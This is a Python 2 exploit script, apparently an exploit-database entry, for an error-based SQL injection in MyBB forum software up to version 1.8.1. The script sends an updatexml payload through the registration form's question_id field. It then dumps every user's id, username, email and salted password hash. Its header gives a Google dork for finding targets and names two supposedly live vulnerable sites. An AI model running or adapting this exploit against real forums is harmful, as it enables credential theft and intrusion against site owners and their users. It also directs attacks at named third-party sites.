MyBB 1.8.X <= 1.8.1 Error based SQL Injection

1. #!/usr/bin/env python
2. # Exploit Title: MyBB 1.8.X <= 1.8.1 Error based SQL Injection
3. # Date : 2014-11-15
4. # Google Dork : intext:Powered By MyBB
5. # Vendor Homepage: http://www.mybb.com/
6. # Software Link: http://resources.mybb.com/downloads/mybb_1801.zip
7. # Version: 1.8.X
8. # Tested on: Linux / Python 2.7
9. # Status : Patched in MyBB 1.8.2
10. # Author : MakMan -- mak.man@live.com -- https://www.facebook.com/hackticlabs
11. # Live Vulnerable Targets : http://livedemo.installatron.com/1416038193mybb/ : http://gamergate.community/
12.  
13. print '\n\n---------------------------------------------------------------------------------'
14. print 'Script Coded by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
15. print '-----------------------MyBB 1.8.X Error based SQL Injection---------------------'
16. print '---------------------------------------------------------------------------------\n\n\n'
17. url = raw_input('Enter URL http://www.exmaple.com/path_to_mybb :: ')
18. url = url.rstrip('/')
19. ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
20.  
21. import sys, re
22. import urllib2, urllib
23.  
24. def inject(sql):
25. try:
26. urllib2.urlopen(urllib2.Request('%s/member.php' % url, data="regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=makman%s" % urllib.quote("\' and updatexml(NULL,concat (0x3a,(%s)),NULL) and \'1" % sql), headers={"User-agent": ua}))
27. except urllib2.HTTPError, e:
28. data = e.read()
29. if e.code == 503:
30. txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
31. if txt is not None:
32. return txt.group(1)
33. sys.exit('Error [3], received unexpected data:\n%s' % data)
34. sys.exit('Not Vulnerable i guess !!!')
35. sys.exit('Not Vulnerable or check your inernet connection !!')
36.  
37. def get(name, table, num):
38. sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
39. s = int(inject('LENGTH((%s))' % sqli))
40. if s < 31:
41. return inject(sqli)
42. else:
43. r = ''
44. for i in range(1, s+1, 31):
45. r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
46. return r
47.  
48.  
49. members_table= inject('select table_name from information_schema.tables where table_schema=database() and table_name regexp 0x757365727324 limit 0,1')
50. n = inject('SELECT COUNT(*) FROM %s' % members_table)
51. print '----------------------------------------------------------------------------'
52. print '* Found %s users' % n
53. print '----------------------------------------------------------------------------'
54. for j in range(int(n)):
55. print '{:20s} {:20s}'.format('Id',get('uid', members_table, j))
56. print '{:20s} {:20s}'.format('Name',get('username', members_table, j))
57. print '{:20s} {:20s}'.format('Email',get('email', members_table, j))
58. print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(password,0x3a,salt)', members_table, j))
59. print '----------------------------------------------------------------------------'